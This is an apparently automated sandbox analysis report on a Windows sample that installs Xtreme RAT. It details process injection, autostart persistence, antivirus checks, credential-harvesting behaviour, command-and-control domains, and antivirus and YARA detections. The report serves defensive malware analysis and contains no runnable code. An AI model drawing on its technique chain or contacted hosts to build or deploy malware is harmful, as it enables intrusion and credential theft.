Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Windows\InstallDir\Server.exeProcess information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_00406170
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: GetLocaleInfoA,12_2_0040BCFC
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: GetLocaleInfoA,12_2_0040BCB0
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeQueries volume information: C:\ VolumeInformation
Queries time zone informationShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation DynamicDaylightTimeDisabledJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C89790 GetLocalTime,GetDateFormatW,GetTimeFormatW,3_2_00C89790
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8854C GetUserNameA,3_2_00C8854C
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_004855D0 GetVersion,12_2_004855D0
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 546427 Sample: sxz.exe Startdate: 03/05/2018 Architecture: WINDOWS Score: 100 105 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->105 107 Antivirus detection for submitted file 2->107 109 Multi AV Scanner detection for dropped file 2->109 111 9 other signatures 2->111 10 sxz.exe 1 2 2->10         started        14 explorer.exe 2->14         started        16 explorer.exe 1 2->16         started        18 6 other processes 2->18 process3 file4 91 C:\Users\user\...\Skype.exe:Zone.Identifier, ASCII 10->91 dropped 169 Creates multiple autostart registry keys 10->169 171 Modifies the context of a thread in another process (thread injection) 10->171 173 Injects a PE file into a foreign processes 10->173 20 sxz.exe 12 10->20         started        175 Drops executables to the windows directory (C:\Windows) and starts them 14->175 23 Server.exe 14->23         started        signatures5 process6 file7 89 C:\Users\user~1\AppData\Local\...\server.exe, PE32 20->89 dropped 26 server.exe 5 7 20->26         started        30 javaw.exe 26 20->30         started        147 Found evasive API chain (may stop execution after checking mutex) 23->147 149 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 23->149 151 Tries to detect virtual machines 23->151 153 Contains functionality to inject threads in other processes 23->153 signatures8 process9 file10 93 C:\Windows\InstallDir\Server.exe, PE32 26->93 dropped 161 Found evasive API chain (may stop execution after checking mutex) 26->161 163 Creates an undocumented autostart registry key 26->163 165 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->165 167 10 other signatures 26->167 32 svchost.exe 1 26->32         started        35 358saxio.exe 26->35         started        37 iexplore.exe 1 26->37         started        95 C:\Users\...\Retrive5899708393590982329.vbs, ASCII 30->95 dropped 97 C:\Users\...\Retrive3783187546293847897.vbs, ASCII 30->97 dropped 39 xcopy.exe 30->39         started        42 java.exe 30->42         started        44 cmd.exe 30->44         started        46 cmd.exe 30->46         started        signatures11 process12 file13 129 Found evasive API chain (may stop execution after checking mutex) 32->129 131 Tries to detect virtual machines 32->131 133 Contains functionality to inject threads in other processes 32->133 48 Server.exe 32->48         started        135 Creates multiple autostart registry keys 35->135 137 Modifies the context of a thread in another process (thread injection) 35->137 139 Injects a PE file into a foreign processes 35->139 52 358saxio.exe 35->52         started        141 Installs Xtreme RAT 37->141 73 C:\Users\user\AppData\Roaming\...\javacpl.cpl, PE32 39->73 dropped 75 C:\Users\user\AppData\Roaming\...\zip.dll, PE32 39->75 dropped 77 C:\Users\user\AppData\...\wsdetect.dll, PE32 39->77 dropped 83 86 other files (none is malicious) 39->83 dropped 143 Drops files with a non-matching file extension (content does not match file extension) 39->143 79 C:\Users\...\Retrive5306090169834682625.vbs, ASCII 42->79 dropped 81 C:\Users\...\Retrive4502924618821110619.vbs, ASCII 42->81 dropped 145 Exploit detected, runtime environment starts unknown processes 42->145 55 cmd.exe 42->55         started        57 cmd.exe 42->57         started        59 cscript.exe 44->59         started        61 cscript.exe 46->61         started        signatures14 process15 dnsIp16 85 C:\Users\user~1\AppData\...\358saxio.exe, PE32 48->85 dropped 87 C:\Users\user~1\AppData\...\358saxio.exe.exe, data 48->87 dropped 113 Writes to foreign memory regions 48->113 115 Allocates memory in foreign processes 48->115 117 Creates a thread in another existing process (thread injection) 48->117 119 Injects a PE file into a foreign processes 48->119 63 358saxio.exe 48->63         started        67 iexplore.exe 48->67         started        101 fashionstune.com 103.48.119.225, 49188, 49189, 49190 AONB-AS-APAlwaysOnNetworkBangladeshLtdBD Bangladesh 52->101 103 iaficasioo.zapto.org 52->103 121 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->121 123 Tries to steal Mail credentials (via file access) 52->123 125 Tries to harvest and steal ftp login credentials 52->125 127 Tries to harvest and steal browser information (history, passwords, etc) 52->127 69 cscript.exe 55->69         started        71 cscript.exe 57->71         started        file17 signatures18 process19 file20 99 C:\Users\user\AppData\Roaming\...\Skype.exe, PE32 63->99 dropped 155 Modifies the context of a thread in another process (thread injection) 63->155 157 Injects a PE file into a foreign processes 63->157 159 Installs Xtreme RAT 67->159 signatures21

Simulations

Behavior and APIs

TimeTypeDescription
10:11:35API Interceptor2x Sleep call for process: sxz.exe modified
10:11:46API Interceptor10x Sleep call for process: svchost.exe modified
10:11:47API Interceptor1x Sleep call for process: javaw.exe modified
10:11:48API Interceptor1666x Sleep call for process: explorer.exe modified
10:11:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sxz.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
10:11:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU C:\Windows\InstallDir\Server.exe
10:11:50API Interceptor1x Sleep call for process: server.exe modified
10:11:50AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM C:\Windows\InstallDir\Server.exe
10:11:58API Interceptor28x Sleep call for process: 358saxio.exe modified
10:12:02API Interceptor1x Sleep call for process: java.exe modified
10:12:07API Interceptor11x Sleep call for process: cscript.exe modified
10:12:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
10:12:30API Interceptor1x Sleep call for process: Server.exe modified
10:13:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sVCHXnbVdLZ "C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\user\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik"

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
sxz.exe43%virustotalBrowse
sxz.exe100%AviraDR/Delphi.wqtni

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user~1\AppData\Local\Temp\358saxio.exe100%AviraDR/Delphi.svunx
C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs100%AviraVBS/Agent.281
C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs100%AviraVBS/Agent.276
C:\Users\user\AppData\Roaming\Microsoft\Skype.exe100%AviraDR/Delphi.svunx
C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs100%AviraVBS/Agent.281
C:\Users\user~1\AppData\Local\Temp\server.exe100%AviraTR/Spy.59904216
C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs100%AviraVBS/Agent.276
C:\Users\user~1\AppData\Local\Temp\358saxio.exe48%virustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLink
19.1.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen
27.1.Server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
5.2.svchost.exe.c80000.6.unpack100%AviraTR/Spy.59904216
3.2.server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
15.0.Server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
2.1.sxz.exe.400000.0.unpack100%AviraDR/Injector.toian
35.2.358saxio.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
27.2.Server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
15.0.Server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
19.0.358saxio.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.Gen
3.0.server.exe.c80000.2.unpack100%AviraTR/Spy.59904216
35.0.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
6.2.iexplore.exe.c80000.2.unpack100%AviraTR/Spy.59904216
35.1.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.Gen
6.0.iexplore.exe.c80000.0.unpack100%AviraTR/Spy.59904216
12.2.358saxio.exe.23c0000.3.unpack100%AviraTR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.1.unpack100%AviraDR/Injector.toian
19.2.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
14.1.explorer.exe.1b80000.0.unpack100%AviraTR/Spy.59904216
1.2.sxz.exe.1a40000.3.unpack100%AviraDR/Injector.toian
35.2.358saxio.exe.1440000.3.unpack100%AviraTR/Crypt.XPACK.Gen
3.0.server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
15.1.Server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
1.0.sxz.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
14.1.explorer.exe.1b80000.1.unpack100%AviraTR/Spy.59904216
35.0.358saxio.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen
27.0.Server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
5.0.svchost.exe.c80000.0.unpack100%AviraTR/Spy.59904216
27.0.Server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
15.0.Server.exe.c80000.2.unpack100%AviraTR/Spy.59904216
2.2.sxz.exe.400000.2.unpack100%AviraDR/Injector.toian
19.0.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
15.2.Server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
12.2.358saxio.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.3.unpack100%AviraDR/Injector.toian
2.0.sxz.exe.400000.2.unpack100%AviraDR/Injector.toian
34.0.iexplore.exe.c80000.0.unpack100%AviraTR/Spy.59904216
15.0.Server.exe.c80000.3.unpack100%AviraTR/Spy.59904216
3.0.server.exe.c80000.3.unpack100%AviraTR/Spy.59904216
34.2.iexplore.exe.c80000.2.unpack100%AviraTR/Spy.59904216
27.0.Server.exe.c80000.3.unpack100%AviraTR/Spy.59904216
3.0.server.exe.c80000.1.unpack100%AviraTR/Spy.59904216
2.0.sxz.exe.400000.5.unpack100%AviraDR/Injector.toian
5.2.svchost.exe.290000.1.unpack100%AviraTR/Spy.59904216
1.2.sxz.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
12.0.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
27.0.Server.exe.c80000.2.unpack100%AviraTR/Spy.59904216
12.0.358saxio.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen
3.1.server.exe.c80000.0.unpack100%AviraTR/Spy.59904216
35.0.358saxio.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.4.unpack100%AviraDR/Injector.toian
19.0.358saxio.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen
35.0.358saxio.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen
2.0.sxz.exe.400000.0.unpack100%AviraDR/Injector.toian
1.1.sxz.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
19.0.358saxio.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.Gen
12.1.358saxio.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen

Domains

SourceDetectionScannerLabelLink
iaficasioo.zapto.org1%virustotalBrowse
fashionstune.com3%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthor
C:\Windows\InstallDir\Server.exeXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
C:\Windows\InstallDir\Server.exeRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
C:\Users\user~1\AppData\Local\Temp\server.exeXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
C:\Users\user~1\AppData\Local\Temp\server.exeRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>

Memory Dumps

SourceRuleDescriptionAuthor
00000003.00000000.14905165956.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000000.14937698570.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000002.14989895202.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000000.15000788791.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000000.14932929795.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000022.00000000.15012281235.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000022.00000000.15012281235.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000003.00000001.14905808954.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000E.00000001.14937243423.01B81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000003.00000002.14987723130.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000001.15007151931.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000000.15001441864.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000005.00000002.15179880413.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000005.00000002.15179880413.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000000.14999659592.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000006.00000002.14955870384.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000006.00000002.14955870384.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000000.14944848932.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000005.00000002.15177862719.00290000.00000004.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000005.00000002.15177862719.00290000.00000004.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000000.14950318636.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000F.00000001.14957378618.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000006.00000000.14913253676.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000006.00000000.14913253676.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000003.00000000.14904035142.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000000E.00000001.14936774837.01B81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000002.15035469105.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000003.00000000.14905430148.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000003.00000000.14904944731.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000005.00000000.14909911900.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000005.00000000.14909911900.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
0000001B.00000000.15004091676.00C81000.00000020.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
00000022.00000002.15021754459.00C80000.00000040.sdmpXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
00000022.00000002.15021754459.00C80000.00000040.sdmpRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>

Unpacked PEs

SourceRuleDescriptionAuthor
34.0.iexplore.exe.c80000.0.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
34.0.iexplore.exe.c80000.0.raw.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.1.Server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.1.Server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.2.server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.2.server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.0.Server.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.c80000.6.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
5.2.svchost.exe.c80000.6.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
15.0.Server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
15.0.Server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
3.0.server.exe.c80000.2.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
3.0.server.exe.c80000.2.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
6.0.iexplore.exe.c80000.0.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
6.0.iexplore.exe.c80000.0.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
27.2.Server.exe.c80000.1.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
27.2.Server.exe.c80000.1.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
6.2.iexplore.exe.c80000.2.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
6.2.iexplore.exe.c80000.2.unpackRAT_XtremeDetects Xtreme RATKevin Breen <kevin@techanarchy.net>
5.2.svchost.exe.c80000.6.raw.unpackXtreme_Sep17_1Detects XTREME sample analyzed in September 2017Florian Roth
